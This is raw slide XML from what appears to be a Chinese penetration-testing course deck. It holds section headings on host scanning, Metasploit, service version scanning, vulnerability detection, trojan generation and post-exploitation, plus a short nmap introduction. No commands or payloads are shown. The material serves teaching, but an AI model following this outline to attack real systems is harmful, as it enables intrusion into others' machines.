          <p:cNvPr id="81" name="等腰三角形 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125866" y="4437500"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="等腰三角形 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348800" y="5033297"/>
            <a:ext cx="2607127" cy="1948097"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="7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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6146" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="3333750"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.1 认识Metasploit</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="3919220"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.2 常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="4504690"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="5090160"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.4 漏洞检测</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="5675630"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.5 生成木马</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="6261100"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.6 后渗透攻击</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>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a:xfrm>
            <a:off x="5554701" y="1118051"/>
            <a:ext cx="5451475" cy="2916555"/>
            <a:chOff x="6627851" y="1754191"/>
            <a:chExt cx="5451475" cy="2916555"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="2086296"/>
              <a:ext cx="4785995" cy="2584450"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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150000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>       </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>nmap是一个网络连接端扫描软件，用来扫描网上的主机，确定哪些主机是存活主机。发现指的是从网络中寻找活跃主机的过程，该过程的关注点不在于如何获取目标主机详细信息，而是在尽量减少资源消耗的情况下，获得目标主机在逻辑上的分布。</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="1754191"/>
              <a:ext cx="1724660" cy="368300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>nmap工具简介</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【相关知识】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="D:\用户目录\Desktop\政治审核\PPT用图\Render2.jpgRender2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="2200275"/>
            <a:ext cx="4585335" cy="3115945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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0" name="组合 49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="258445" y="2941320"/>
            <a:ext cx="11638280" cy="2962910"/>
            <a:chOff x="407" y="2772"/>
            <a:chExt cx="18328" cy="4666"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="Group 3"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="407" y="5987"/>
              <a:ext cx="18328" cy="121"/>
              <a:chOff x="1765833" y="4036682"/>
              <a:chExt cx="9317522" cy="50962"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3" name="Rectangle 4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3040807" y="4036682"/>
                <a:ext cx="1683494" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="4" name="Rectangle 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4724303" y="4036682"/>
                <a:ext cx="1715155" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="Rectangle 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6435557" y="4036682"/>
                <a:ext cx="1661572" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
